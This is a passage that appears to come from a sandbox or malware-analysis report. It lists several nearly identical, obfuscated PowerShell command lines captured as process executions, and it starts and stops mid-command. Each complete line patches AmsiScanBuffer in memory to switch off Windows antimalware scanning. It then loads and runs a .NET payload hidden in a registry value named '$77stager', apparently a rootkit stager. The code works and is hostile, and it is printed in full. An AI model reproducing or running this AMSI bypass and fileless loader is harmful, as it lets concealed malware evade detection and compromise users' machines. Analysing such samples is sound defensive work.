$_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+'.'+'dl'+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+'W'+[Char](105)+'n'+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+'af'+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$tfkFCJNUeYFksN=$lzHbmAdzWmhal.GetMethod(''+'G'+'e'+'t'+''+'P'+''+'r'+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+'ic'+[Char](44)+'S'+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sodoDiGTDjaouVcTvaP=zpfhcoKhuSRe @([String])([IntPtr]);$YmuCHTGqGicEIvAfOloGlb=zpfhcoKhuSRe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JlIsoqDNkGD=$lzHbmAdzWmhal.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$zYDGZLrhWvSOyS=$tfkFCJNUeYFksN.Invoke($Null,@([Object]$JlIsoqDNkGD,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$TouRjOJyGPGqYKHJO=$tfkFCJNUeYFksN.Invoke($Null,@([Object]$JlIsoqDNkGD,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'ect')));$mbSduRK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zYDGZLrhWvSOyS,$sodoDiGTDjaouVcTvaP).Invoke('a'+[Char](109)+'si'+[Char](46)+'d'+'l'+''+'l'+'');$iziXIiTqRazyOTPuU=$tfkFCJNUeYFksN.Invoke($Null,@([Object]$mbSduRK,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+'r')));$FiihamMZak=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TouRjOJyGPGqYKHJO,$YmuCHTGqGicEIvAfOloGlb).Invoke($iziXIiTqRazyOTPuU,[uint32]8,4,[ref]$FiihamMZak);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iziXIiTqRazyOTPuU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TouRjOJyGPGqYKHJO,$YmuCHTGqGicEIvAfOloGlb).Invoke($iziXIiTqRazyOTPuU,[uint32]8,0x20,[ref]$FiihamMZak);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+'RE').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RVtYCBqEUpJx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qssUtdqYmUFKZF,[Parameter(Position=1)][Type]$gaCgwlBRMI)$UChxFCetXct=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'at'+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+','+'A'+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$UChxFCetXct.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+'a'+[Char](109)+''+'e'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'ySig'+[Char](44)+''+'P'+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$qssUtdqYmUFKZF).SetImplementationFlags(''+'R'+'un'+'t'+''+'i'+''+[Char](109)+'e'+','+'Ma'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');$UChxFCetXct.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+','+[Char](78)+''+[Char](101)+'wS'+[Char](108)+''+'o'+'t'+','+'V'+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$gaCgwlBRMI,$qssUtdqYmUFKZF).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $UChxFCetXct.CreateType();}$QjfWZrCYTKjQP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+[Char](97)+'f'+'e'+''+[Char](78)+'a'+[Char](116)+'i'+'v'+'e'+'M'+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$ffFeFSdFhUUmSm=$QjfWZrCYTKjQP.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'ro'+'c'+'Ad'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+'li'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xNiMVJOviaFmCaiMkdI=RVtYCBqEUpJx @([String])([IntPtr]);$pFUnbDprqtZrscqeqmzBtS=RVtYCBqEUpJx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CUrVTeZZoWQ=$QjfWZrCYTKjQP.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Mo'+[Char](100)+'u'+'l'+''+'e'+'H'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$WryqWpiWpOONVs=$ffFeFSdFhUUmSm.Invoke($Null,@([Object]$CUrVTeZZoWQ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+'r'+'ar'+[Char](121)+''+'A'+'')));$IQZKNDGZxZZhBNvgn=$ffFeFSdFhUUmSm.Invoke($Null,@([Object]$CUrVTeZZoWQ,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'tua'+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$NvucYhX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WryqWpiWpOONVs,$xNiMVJOviaFmCaiMkdI).Invoke(''+'a'+'m'+'s'+'i.'+'d'+''+[Char](108)+''+'l'+'');$lcnVBUPssCrdieYKv=$ffFeFSdFhUUmSm.Invoke($Null,@([Object]$NvucYhX,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+'B'+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$MQdexcbmmR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IQZKNDGZxZZhBNvgn,$pFUnbDprqtZrscqeqmzBtS).Invoke($lcnVBUPssCrdieYKv,[uint32]8,4,[ref]$MQdexcbmmR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lcnVBUPssCrdieYKv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IQZKNDGZxZZhBNvgn,$pFUnbDprqtZrscqeqmzBtS).Invoke($lcnVBUPssCrdieYKv,[uint32]8,0x20,[ref]$MQdexcbmmR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NcfhRixCgPck{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sDNagFsZhmPXfV,[Parameter(Position=1)][Type]$hlnekOHmzl)$uPzhNsDttVK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+'t'+'e'+'dD'+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ule',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+'e'+[Char](103)+''+'a'+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+[Char](101)+'al'+[Char](101)+'d'+[Char](44)+''+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'las'+[Char](115)+'',[MulticastDelegate]);$uPzhNsDttVK.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'ial'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+'Pub'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$sDNagFsZhmPXfV).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'Manage'+'d'+'');$uPzhNsDttVK.DefineMethod(''+[Char](73)+'nv'+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+'y'+'S'+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$hlnekOHmzl,$sDNagFsZhmPXfV).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'ime'+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $uPzhNsDttVK.CreateType();}$nLEYNdoPLjgnZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+'e'+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+'i'+'c'+'r'+'o'+'s'+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'at'+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+'s'+'');$wXFmmjBzWlLasK=$nLEYNdoPLjgnZ.GetMethod('Ge'+'t'+'P'+[Char](114)+'o'+[Char](99)+''+'A'+''+'d'+''+[Char](100)+''+[Char](114)+'e'+'s'+'s',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cPfmeBcnUpORXRjuiZh=NcfhRixCgPck @([String])([IntPtr]);$YNbmKaMDsHXRRkLFerxiYV=NcfhRixCgPck @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$RFEdcmiDgIi=$nLEYNdoPLjgnZ.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'rn'+'e'+''+'l'+''+'3'+'2'+'.'+''+[Char](100)+'ll')));$lSbKrYvqbOdyNp=$wXFmmjBzWlLasK.Invoke($Null,@([Object]$RFEdcmiDgIi,[Object]('L'+'o'+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$voaGOByNdyUrMTrVQ=$wXFmmjBzWlLasK.Invoke($Null,@([Object]$RFEdcmiDgIi,[Object](''+'V'+''+[Char](105)+'r'+'t'+'u'+[Char](97)+''+'l'+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$rjiUmTT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lSbKrYvqbOdyNp,$cPfmeBcnUpORXRjuiZh).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$xcBMWJzslOUmNIsqe=$wXFmmjBzWlLasK.Invoke($Null,@([Object]$rjiUmTT,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+'e'+''+[Char](114)+'')));$TpAArERmfp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voaGOByNdyUrMTrVQ,$YNbmKaMDsHXRRkLFerxiYV).Invoke($xcBMWJzslOUmNIsqe,[uint32]8,4,[ref]$TpAArERmfp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xcBMWJzslOUmNIsqe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voaGOByNdyUrMTrVQ,$YNbmKaMDsHXRRkLFerxiYV).Invoke($xcBMWJzslOUmNIsqe,[uint32]8,0x20,[ref]$TpAArERmfp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+'A'+'R'+'E'+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+'t'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RhJiUgfvVbud{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$skqjgmuveVYACC,[Parameter(Position=1)][Type]$lSzYPwYrQc)$zFvOGlxHqcB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+'e'+''+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+'e',$False).DefineType(''+'M'+''+[Char](121)+'D'+'e'+''+[Char](108)+'ega'+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+'as'+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'Cl'+'a'+''+[Char](115)+''+[Char](115)+',A'+'u'+''+'t'+''+[Char](111)+''+'C'+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$zFvOGlxHqcB.DefineConstructor('R'+'T'+''+'S'+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+'b'+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$skqjgmuveVYACC).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$zFvOGlxHqcB.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'','P'+'u'+'bl'+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](78)+'e'+'w'+'Sl'+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+'r'+'t'+'u'+'al',$lSzYPwYrQc,$skqjgmuveVYACC).SetImplementationFlags('Ru'+[Char](110)+''+'t'+'i'+'m'+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $zFvOGlxHqcB.CreateType();}$MsZLFzGbQuKTf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+'m'+[Char](46)+''+'d'+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+[Char](115)+'of'+[Char](116)+''+[Char](46)+'W'+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'a'+[Char](102)+''+'e'+''+'N'+'a'+[Char](116)+'i'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+'t'+'ho'+[Char](100)+'s');$SnwldStYfRxkYc=$MsZLFzGbQuKTf.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PjscWZuRMEKqdYVpjuc=RhJiUgfvVbud @([String])([IntPtr]);$BQDmHqyJoUzUiaBLtEVYnJ=RhJiUgfvVbud @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iAlmCHAYYRU=$MsZLFzGbQuKTf.GetMethod('G'+'e'+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'H'+[Char](97)+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$BXOpNGHLpZZccj=$SnwldStYfRxkYc.Invoke($Null,@([Object]$iAlmCHAYYRU,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$ETcvKxTsiSnZaCBBY=$SnwldStYfRxkYc.Invoke($Null,@([Object]$iAlmCHAYYRU,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$IkBtehj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BXOpNGHLpZZccj,$PjscWZuRMEKqdYVpjuc).Invoke('am'+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jeiHISUVmOmHwKdbU=$SnwldStYfRxkYc.Invoke($Null,@([Object]$IkBtehj,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$XdSecpqWDS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ETcvKxTsiSnZaCBBY,$BQDmHqyJoUzUiaBLtEVYnJ).Invoke($jeiHISUVmOmHwKdbU,[uint32]8,4,[ref]$XdSecpqWDS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jeiHISUVmOmHwKdbU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ETcvKxTsiSnZaCBBY,$BQDmHqyJoUzUiaBLtEVYnJ).Invoke($jeiHISUVmOmHwKdbU,[uint32]8,0x20,[ref]$XdSecpqWDS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PyaanalphKAi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BDAKQFlNMPxsRm,[Parameter(Position=1)][Type]$eWHPHOJJbS)$ItOUosgSGhY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+'m'+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e'+[Char](84)+'y'+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+'al'+[Char](101)+'d'+[Char](44)+''+[Char](65)+'n'+'s'+'iC'+'l'+''+'a'+''+[Char](115)+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$ItOUosgSGhY.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+''+','+'Hid'+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'ig,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BDAKQFlNMPxsRm).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+'ag'+[Char](101)+'d');$ItOUosgSGhY.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+',Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'al',$eWHPHOJJbS,$BDAKQFlNMPxsRm).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ItOUosgSGhY.CreateType();}$qhKKfiJfJFSly=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+''+'o'+'so'+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+'2.'+[Char](85)+''+[Char](110)+'s'+'a'+'fe'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'od'+'s'+'');$fkjNNaBNKWvFKa=$qhKKfiJfJFSly.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+'o'+[Char](99)+'A'+'d'+'dr'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+'t'+'ic'),$Null,[R